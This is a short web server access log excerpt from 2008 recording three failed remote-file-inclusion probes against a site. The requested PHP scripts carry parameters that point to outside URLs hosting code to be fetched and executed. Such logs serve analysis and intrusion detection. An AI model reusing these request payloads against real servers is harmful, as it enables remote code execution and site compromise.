98.136.50.138 - - [26/Oct/2008:09:23:42 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
203.146.15.54 - - [26/Oct/2008:09:23:42 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://daleleblanc.com/webcalendar//includes/errors.html/id23.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
98.136.50.138 - - [26/Oct/2008:09:23:44 -0700] "GET /logs/access_080714.log/sub.php?s=http://business-buket.ru/kx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
